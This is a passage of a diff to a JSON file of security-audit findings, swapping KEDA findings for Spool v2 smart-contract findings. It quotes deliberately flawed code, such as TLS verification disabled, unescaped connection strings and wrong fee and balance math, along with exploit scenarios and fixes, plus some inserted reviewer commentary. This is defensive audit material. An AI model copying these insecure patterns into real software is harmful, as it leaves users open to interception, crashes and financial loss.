Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS (pkg/prommetrics/adapter_prommetrics.go#L82-L99). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port 9022. When Prometheus makes a connection to the server, it is unencrypted, leaving both the request and response vulnerable to interception and tampering in transit. As KEDA does not support TLS for the server, the user has no way to ensure the confidentiality and integrity of these metrics. Recommendations Short term, provide a flag to enable TLS for Prometheus metrics exposed by the Metrics Adapter. The usual way to enable TLS for an HTTP server is using the http.ListenAndServeTLS function.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { + "title": "14. Incorrect use of exchangeRates in doHardWork ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The StrategyRegistry contract's doHardWork function fetches the exchangeRates for all of the tokens involved in the do hard work process, and then it iterates over the strategies and saves the exchangeRates values for the current strategy's tokens in the assetGroupExchangeRates variable; however, when doHardWork is called for a strategy, the exchangeRates variable rather than the assetGroupExchangeRates variable is passed, resulting in the use of incorrect exchange rates.
function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused {
    ...
    // Get exchange rates for tokens and validate them against slippages.
    uint256[] memory exchangeRates = SpoolUtils.getExchangeRates(dhwParams.tokens, _priceFeedManager);
    for (uint256 i; i < dhwParams.tokens.length; ++i) {
        if (
            exchangeRates[i] < dhwParams.exchangeRateSlippages[i][0]
                || exchangeRates[i] > dhwParams.exchangeRateSlippages[i][1]
        ) {
            revert ExchangeRateOutOfSlippages();
        }
    }
    ...
    // Get exchange rates for this group of strategies.
    uint256 assetGroupId = IStrategy(dhwParams.strategies[i][0]).assetGroupId();
    address[] memory assetGroup = IStrategy(dhwParams.strategies[i][0]).assets();
    uint256[] memory assetGroupExchangeRates = new uint256[](assetGroup.length);
    for (uint256 j; j < assetGroup.length; ++j) {
        bool found = false;
        for (uint256 k; k < dhwParams.tokens.length; ++k) {
            if (assetGroup[j] == dhwParams.tokens[k]) {
                assetGroupExchangeRates[j] = exchangeRates[k];
                found = true;
                break;
            }
        }
    ...
    // Do the hard work on the strategy.
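    // Reviewer note (not in the original source): the call below passes
    // exchangeRates (rates for all dhwParams.tokens) where
    // assetGroupExchangeRates, computed above for this strategy's asset
    // group, is the intended value.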
DhwInfo memory dhwInfo = IStrategy(strategy).doHardWork(
        StrategyDhwParameterBag({
            swapInfo: dhwParams.swapInfo[i][j],
            compoundSwapInfo: dhwParams.compoundSwapInfo[i][j],
            slippages: dhwParams.strategySlippages[i][j],
            assetGroup: assetGroup,
            exchangeRates: exchangeRates,
            withdrawnShares: _sharesRedeemed[strategy][dhwIndex],
            masterWallet: address(_masterWallet),
            priceFeedManager: _priceFeedManager,
            baseYield: dhwParams.baseYields[i][j],
            platformFees: platformFeesMemory
        })
    );
    // Bookkeeping.
    _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();
    _exchangeRates[strategy][dhwIndex].setValues(exchangeRates);
    ...
Figure 14.1: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222-L341 The exchangeRates values are used by a strategy's doHardWork function to calculate how many assets in USD value are to be deposited and how many in USD value are currently deposited in the strategy. As a consequence of using exchangeRates rather than assetGroupExchangeRates, the contract will return incorrect values. Additionally, the _exchangeRates variable is returned by the strategyAtIndexBatch function, which is used when simulating deposits. Exploit Scenario Bob deploys a smart vault, and users start depositing into it. However, the first time doHardWork is called, they notice that the deposited assets and the reported USD value deposited into the strategies are incorrect. They panic and start withdrawing all of the funds. Recommendations Short term, replace exchangeRates with assetGroupExchangeRates in the relevant areas of doHardWork and where it sets the _exchangeRates variable. Long term, improve the system's unit and integration tests to verify that the deposited value in a strategy is the expected amount. Additionally, when reviewing the code, look for local variables that are set but then never used; this is a warning sign that problems may arise.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Low" ] }, { - "title": "4. Return value is dereferenced before error check ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "After certain calls to http.NewRequestWithContext, the *Request return value is dereferenced before the error return value is checked (see the highlighted lines in figures 4.1 and 4.2).
checkTokenRequest, err := http.NewRequestWithContext(ctx, \"HEAD\", tokenURL.String(), nil)
checkTokenRequest.Header.Set(\"X-Subject-Token\", token)
checkTokenRequest.Header.Set(\"X-Auth-Token\", token)
if err != nil {
    return false, err
}
Figure 4.1: pkg/scalers/openstack/keystone_authentication.go#L118-L124
req, err := http.NewRequestWithContext(ctx, \"GET\", url, nil)
req.SetBasicAuth(s.metadata.username, s.metadata.password)
req.Header.Set(\"Origin\", s.metadata.corsHeader)
if err != nil {
    return -1, err
}
Figure 4.2: pkg/scalers/artemis_scaler.go#L241-L248 If an error occurred in the call to NewRequestWithContext, this behavior could result in a panic due to a nil pointer dereference. Exploit Scenario One of the calls to http.NewRequestWithContext shown in figures 4.1 and 4.2 returns an error and a nil *Request pointer. The subsequent code dereferences the nil pointer, resulting in a panic, crash, and DoS condition for the affected KEDA scaler. Recommendations Short term, check the error return value before accessing the returned *Request (e.g., by calling methods on it). 
Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", + "title": "15. LinearAllocationProvider could return an incorrect result ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The LinearAllocationProvider contract returns an incorrect result when the given smart vault has a riskTolerance value of -8 due to an incorrect literal value in the riskArray variable. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { ... uint24 [21] memory riskArray = [ 100000, 95000, 900000 , ... ]; ... uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { ... results[i] = apy * riskArray[ uint8 (20 - riskt)] + risk * riskArray[ uint8 (riskt)] ; resSum += results[i]; } uint256 resSum2; for ( uint8 i; i < results.length; ++i) { results[i] = FULL_PERCENT * results[i] / resSum; resSum2 += results[i]; } results[0] += FULL_PERCENT - resSum2; return results; Figure 15.1: A snippet of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L9-L67 The riskArray's third element is incorrect; this affects the computed allocation for smart vaults that have a riskTolerance value of -8 because the riskt variable would be 2 , which is later used as an index into the riskArray . The subexpression risk * riskArray[uint8(riskt)] is incorrect by a factor of 10. Exploit Scenario Bob deploys a smart vault with a riskTolerance value of -8 and an empty strategyAllocation value. The allocation between the strategies is computed on the spot using the LinearAllocationProvider contract, but the allocation is wrong. Recommendations Short term, replace 900000 with 90000 in the calculateAllocation function. Long term, improve the system's unit and integration tests to catch issues such as this. Document the use and meaning of constants such as the values in riskArray . This will make it more likely that the Spool team will find these types of mistakes.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "5. Unescaped components in PostgreSQL connection string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The PostgreSQL scaler creates a connection string by formatting the configured host, port, username, database name, SSL mode, and password with fmt.Sprintf : meta.connection = fmt.Sprintf( \"host=%s port=%s user=%s dbname=%s sslmode=%s password=%s\" , host, port, userName, dbName, sslmode, password, ) Figure 5.1: pkg/scalers/postgresql_scaler.go#L127-L135 However, none of the parameters included in the format string are escaped before the call to fmt.Sprintf . According to the PostgreSQL documentation , To write an empty value, or a value containing spaces, surround it with single quotes, for example keyword = 'a value' . Single quotes and backslashes within a value must be escaped with a backslash, i.e., \\' and \\\\ . As KEDA does not perform this escaping, the connection string could fail to parse if any of the configuration parameters (e.g., the password) contains symbols with special meaning in PostgreSQL connection strings. Furthermore, this issue may allow the injection of harmful or unintended parameters into the connection string using spaces and equal signs. 
Although the latter attack violates assumptions about the application's behavior, it is not a severe issue in KEDA's case because users can already pass full connection strings via the connectionFromEnv configuration parameter. Exploit Scenario A user configures the PostgreSQL scaler with a password containing a space. As the PostgreSQL scaler does not escape the password in the connection string, when the client connection is initialized, the string fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, escape the user-provided PostgreSQL parameters using the method described in the PostgreSQL documentation . Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", + "title": "16. Incorrect formula used for adding/subtracting two yields ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The doHardWork function adds two yields with different base values to compute the given strategy's total yield, which results in the collection of fewer ecosystem fees and treasury fees. It is incorrect to add two yields that have different base values. The correct formula to compute the total yield from two consecutive yields Y1 and Y2 is Y1 + Y2 + (Y1*Y2) . The doHardWork function in the Strategy contract adds the protocol yield and the rewards yield to calculate the given strategy's total yield. The protocol yield percentage is calculated with the base value of the strategy's total assets at the start of the current do hard work cycle, while the rewards yield percentage is calculated with the base value of the total assets currently owned by the strategy. dhwInfo.yieldPercentage = _getYieldPercentage(dhwParams.baseYield); dhwInfo.yieldPercentage += _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages); Figure 16.1: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L95-L96 Therefore, the total yield of the strategy is computed as less than its actual yield, and the use of this value to compute fees results in the collection of fewer fees for the platform's governance system. The same issue also affects the computation of the total yield of a strategy on every do hard work cycle: _stateAtDhw[strategy][dhwIndex] = StateAtDhwIndex({ sharesMinted: uint128 (dhwInfo.sharesMinted), totalStrategyValue: uint128 (dhwInfo.valueAtDhw), totalSSTs: uint128 (dhwInfo.totalSstsAtDhw), yield: int96 (dhwInfo.yieldPercentage) + _stateAtDhw[strategy][dhwIndex - 1].yield, // accumulate the yield from before timestamp: uint32 (block.timestamp) }); Figure 16.2: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L331-L337 This value of the total yield of a strategy is used to calculate the management fees for a given smart vault, which results in fewer fees paid to the smart vault owner. Exploit Scenario The Spool team deploys the system. Alice deposits 1,000 tokens into a vault, which mints 1,000 strategy share tokens for the vault. On the next do hard work execution, the tokens earn 8% yield and 30 reward tokens from the protocol. The 30 reward tokens are then exchanged for 20 deposit tokens. At this point, the total tokens earned by the strategy are 100 and the total yield is 10%. However, the doHardWork function computes the total yield as 9.85%, which is incorrect, resulting in fewer fees collected for the platform. 
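To make the compounding concrete with the scenario's numbers: the first yield is 8%, the second is 20/1080, or about 1.85%, and the compounded total is 0.08 + 0.0185 + 0.08 * 0.0185, which is almost exactly 10%, not the 9.85% the naive sum produces. A minimal sketch of the compounded update, assuming both helpers return fixed-point percentages scaled by a hypothetical YIELD_FULL_PERCENT constant (the constant name is an assumption, not from the codebase):

    int256 baseYield = _getYieldPercentage(dhwParams.baseYield);
    int256 rewardYield = _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages);
    // Y1 + Y2 + (Y1 * Y2), with the cross term rescaled to the fixed-point base.
    dhwInfo.yieldPercentage = baseYield + rewardYield + (baseYield * rewardYield) / YIELD_FULL_PERCENT;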
Recommendations Short term, use the correct formula to calculate a given strategy's total yield in both the Strategy contract and the StrategyRegistry contract. Note that the syncDepositsSimulate function subtracts a strategy's total yield at different do hard work indexes in DepositManager.sol#L322-L326 to compute the difference between the strategy's yields between two do hard work cycles. After fixing this issue, this function's computation will be incorrect. Long term, review the entire codebase to find all of the mathematical formulas used. Document these formulas, their assumptions, and their derivations to avoid the use of incorrect formulas.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify field to the value of enableTLS (Figure 6.1), which means that certificate and server name verification is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineffective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the confidentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata field to true . Unbeknownst to the user, KEDA has disabled TLS certificate verification, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously influence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user specifies the enableTLS parameter.", + "title": "17. Smart vaults with re-registered strategies will not be usable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The StrategyRegistry contract does not clear the state related to a strategy when removing it. As a result, if the removed strategy is registered again, the StrategyRegistry contract will still contain the strategy's previous state, resulting in a temporary DoS of the smart vaults using it. 
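Ahead of the detailed figures below, a minimal sketch of the cleanup that the short-term recommendation calls for, assuming re-registration is an intended use case (state names as in figures 17.1 and 17.2):

    function _removeStrategy(address strategy) private {
        if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy});
        _accessControl.revokeRole(ROLE_STRATEGY, strategy);
        // Hypothetical cleanup so that a later registerStrategy starts from a clean slate.
        delete _currentIndexes[strategy];
        delete _dhwAssetRatios[strategy];
    }

Note that nested per-index state such as _assetsDeposited cannot be bulk-deleted in Solidity, which is one argument for the alternative of rejecting re-registration in registerStrategy instead.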
The StrategyRegistry.registerStrategy function is used to register a strategy and to initialize the state related to it (figure 17.1). StrategyRegistry tracks the state of the strategies by using their address. function registerStrategy ( address strategy ) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert StrategyAlreadyRegistered({address_: strategy}); _accessControl.grantRole(ROLE_STRATEGY, strategy); _currentIndexes[strategy] = 1 ; _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _stateAtDhw[ address (strategy)][ 0 ].timestamp = uint32 ( block.timestamp ); } Figure 17.1: The registerStrategy function in spool-v2-core/StrategyRegistry.sol The StrategyRegistry._removeStrategy function is used to remove a strategy by revoking its ROLE_STRATEGY role. function _removeStrategy ( address strategy ) private { if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy}); _accessControl.revokeRole(ROLE_STRATEGY, strategy); } Figure 17.2: The _removeStrategy function in spool-v2-core/StrategyRegistry.sol While removing a strategy, the StrategyRegistry contract does not remove the state related to that strategy. As a result, when that strategy is registered again, StrategyRegistry will contain values from the previous period. This could make the smart vaults using the strategy unusable or cause the unintended transfer of assets between other strategies and this strategy. Exploit Scenario Strategy S is registered. StrategyRegistry._currentIndex[S] is equal to 1 . Alice creates a smart vault X that uses strategy S. Bob deposits 1 million WETH into smart vault X. StrategyRegistry._assetsDeposited[S][1][WETH] is equal to 1 million WETH. The doHardWork function is called for strategy S. WETH is transferred from the master wallet to strategy S and is deposited into the protocol. A Spool system admin removes strategy S upon hearing that the protocol is being exploited. However, the admin realizes that the protocol is not being exploited and re-registers strategy S. StrategyRegistry._currentIndex[S] is set to 1 . StrategyRegistry._assetsDeposited[S][1][WETH] is not set to zero and is still equal to 1 million WETH. Alice creates a new vault with strategy S. When doHardWork is called for strategy S, StrategyRegistry tries to transfer 1 million WETH to the strategy. The master wallet does not have those assets, so doHardWork fails for strategy S. The smart vault becomes unusable. Recommendations Short term, modify the StrategyRegistry._removeStrategy function so that it clears states related to removed strategies if re-registering strategies is an intended use case. If this is not an intended use case, modify the StrategyRegistry.registerStrategy function so that it verifies that newly registered strategies have not been previously registered. Long term, properly document all intended use cases of the system and implement comprehensive tests to ensure that the system behaves as expected.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, { - "title": "1. Use of fmt.Sprintf to build host:port string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. 
This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identifier. An address created using simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source files incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port . Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue.", + "title": "18. Incorrect handling of partially burned NFTs results in incorrect SVT balance calculation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The SmartVault._afterTokenTransfer function removes the given NFT ID from the SmartVault._activeUserNFTIds array even if only a fraction of it is burned. As a result, the SmartVaultManager.getUserSVTBalance function, which uses SmartVault._activeUserNFTIds , will show less than the given user's actual balance. SmartVault._afterTokenTransfer is executed after every token transfer (figure 18.1). function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { uint256 count = _activeUserNFTCount[from]; for ( uint256 i ; i < ids.length; ++i) { for ( uint256 j = 0 ; j < count; j++) { if (_activeUserNFTIds[from][j] == ids[i]) { _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1 ]; count--; break ; } } } _activeUserNFTCount[from] = count; return ; } [...] } Figure 18.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol It removes the burned NFT from _activeUserNFTIds . However, it does not consider the amount of the NFT that was burned. As a result, NFTs that are not completely burned will not be considered active by the vault. SmartVaultManager.getUserSVTBalance uses SmartVault._activeUserNFTIds to calculate a given user's SVT balance (figure 18.2). function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 18.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because partial NFTs are not present in SmartVault._activeUserNFTIds , the calculated balance will be less than the user's actual balance. The front end using getUserSVTBalance will show incorrect balances to users. 
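A minimal sketch of the burn-branch change the short-term recommendation describes, assuming the vault is ERC1155-based so that balanceOf(from, id) reflects the post-burn balance when the _afterTokenTransfer hook runs:

    // Hypothetical shape of the burn branch in _afterTokenTransfer:
    if (to == address(0)) {
        uint256 count = _activeUserNFTCount[from];
        for (uint256 i; i < ids.length; ++i) {
            if (balanceOf(from, ids[i]) > 0) {
                continue; // a fraction of the NFT remains, so its ID stays active
            }
            for (uint256 j = 0; j < count; j++) {
                if (_activeUserNFTIds[from][j] == ids[i]) {
                    _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1];
                    count--;
                    break;
                }
            }
        }
        _activeUserNFTCount[from] = count;
        return;
    }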
Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited to the protocols after doHardWork is called. Alice claims SVTs by burning a fraction of her D-NFT. The smart vault removes the D-NFT from _activeUserNFTIds . Alice checks her SVT balance and panics when she sees less than what she expected. She withdraws all of her assets from the system. Recommendations Short term, add a check to the _afterTokenTransfer function so that it checks the balance of the NFT that is burned and removes the NFT from _activeUserNFTIds only when the NFT is burned completely. Long term, improve the system's unit and integration tests to extensively test view functions.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "2. MongoDB scaler does not encode username and password in connection string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The MongoDB scaler creates a connection string URI by concatenating the configured host, port, username, and password: addr := fmt.Sprintf( \"%s:%s\" , meta.host, meta.port) auth := fmt.Sprintf( \"%s:%s\" , meta.username, meta.password) connStr = \"mongodb://\" + auth + \"@\" + addr + \"/\" + meta.dbName Figure 2.1: pkg/scalers/mongo_scaler.go#L191-L193 Per MongoDB documentation, if either the username or password contains a character in the set :/?#[]@ , it must be percent-encoded . However, KEDA does not do this. As a result, the constructed connection string could fail to parse. Exploit Scenario A user configures the MongoDB scaler with a password containing an @ character, and the MongoDB scaler does not encode the password in the connection string. As a result, when the client object is initialized, the URL fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, percent-encode the user-supplied username and password before constructing the connection string. Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", + "title": "19. Transfers of D-NFTs result in double counting of SVT balance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The _activeUserNFTIds and _activeUserNFTCount variables are not updated for the sender's account on the transfer of NFTs. As a result, SVTs for transferred NFTs will be counted twice, causing the system to show an incorrect SVT balance. The _afterTokenTransfer hook in the SmartVault contract is executed after every token transfer to update information about users' active NFTs: function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { ... return ; } // mint or transfer for ( uint256 i; i < ids.length; ++i) { _activeUserNFTIds[to][_activeUserNFTCount[to]] = ids[i]; _activeUserNFTCount[to]++; } } Figure 19.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol When a user transfers an NFT to another user, the function adds the NFT ID to the active NFT IDs of the receiver's account but does not remove the ID from the active NFT IDs of the sender's account. Additionally, the active NFT count is not updated for the sender's account. 
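A minimal sketch of the missing sender-side bookkeeping, mirroring the swap-and-shrink removal already used in the burn branch of figure 19.1 (hypothetical placement inside _afterTokenTransfer, before the receiver's IDs are updated):

    // Plain transfer (neither mint nor burn): deactivate the IDs for the sender.
    if (from != address(0) && to != address(0)) {
        uint256 count = _activeUserNFTCount[from];
        for (uint256 i; i < ids.length; ++i) {
            for (uint256 j = 0; j < count; j++) {
                if (_activeUserNFTIds[from][j] == ids[i]) {
                    _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1];
                    count--;
                    break;
                }
            }
        }
        _activeUserNFTCount[from] = count;
    }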
The getUserSVTBalance function of the SmartVaultManager contract uses the SmartVault contract's _activeUserNFTIds array to calculate a given user's SVT balance: function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 19.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because transferred NFT IDs are active for both senders and receivers, the SVTs corresponding to the NFT IDs will be counted for both users. This double counting will keep increasing the SVT balance for users with every transfer, causing an incorrect balance to be shown to users and third-party integrators. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited into the protocols after doHardWork is called. Alice transfers the D-NFT to herself. The SmartVault contract adds the D-NFT ID to _activeUserNFTIds for Alice again. Alice checks her SVT balance and sees double the balance she had before. Recommendations Short term, modify the _afterTokenTransfer function so that it removes NFT IDs from the active NFT IDs for the sender's account when users transfer D-NFTs and W-NFTs. Long term, add unit test cases for all possible user interactions to catch issues such as this.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "3. Prometheus metrics server does not support TLS ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not offer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS. func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port", + "title": "20. 
Flawed loop for syncing flushes results in higher management fees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The loop used to sync flush indexes in the SmartVaultManager contract computes an inflated value of the oldTotalSVTs variable, which results in higher management fees paid to the smart vault owner. The _syncSmartVault function in the SmartVaultManager contract implements a loop to process every flush index from flushIndex.toSync to flushIndex.current : while (flushIndex.toSync < flushIndex.current) { ... DepositSyncResult memory syncResult = _depositManager.syncDeposits( smartVault, [flushIndex.toSync, bag.lastDhwSynced, bag.oldTotalSVTs], strategies_, [indexes, _getPreviousDhwIndexes(smartVault, flushIndex.toSync)], tokens, bag.fees ); bag.newSVTs += syncResult.mintedSVTs; bag.feeSVTs += syncResult.feeSVTs; bag.oldTotalSVTs += bag.newSVTs; bag.lastDhwSynced = syncResult.dhwTimestamp; emit SmartVaultSynced(smartVault, flushIndex.toSync); flushIndex.toSync++; } Figure 20.1: A snippet of the _syncSmartVault function in spool-v2-core/SmartVaultManager.sol This loop adds the value of mintedSVTs to the newSVTs variable and then computes the value of oldTotalSVTs by adding newSVTs to it in every iteration. Because mintedSVTs are added in every iteration, newly minted SVTs are added for each flush index multiple times when the loop is iterated more than once. The value of oldTotalSVTs is then passed to the syncDeposits function of the DepositManager contract, which uses it to compute the management fee for the smart vault. The use of the inflated value of oldTotalSVTs causes higher management fees to be paid to the smart vault owner. Exploit Scenario Alice deposits assets into a smart vault and flushes it. Before doHardWork is executed, Bob deposits assets into the same smart vault and flushes it. At this point, flushIndex.current has been increased twice for the smart vault. After the execution of doHardWork , the loop to sync the smart vault is iterated twice. As a result, a double management fee is paid to the smart vault owner, and Alice and Bob lose assets. Recommendations Short term, modify the loop so that syncResult.mintedSVTs is added to bag.oldTotalSVTs instead of bag.newSVTs . Long term, be careful when implementing accumulators in loops. Add test cases for multiple interactions to catch such issues.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify field to the value of enableTLS (Figure 6.1), which means that certificate and server name verification is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineffective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. 
This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the confidentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata field to true . Unbeknownst to the user, KEDA has disabled TLS certificate verification, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously influence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user specifies the enableTLS parameter.", + "title": "21. Incorrect ghost strategy check ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The emergencyWithdraw and redeemStrategyShares functions 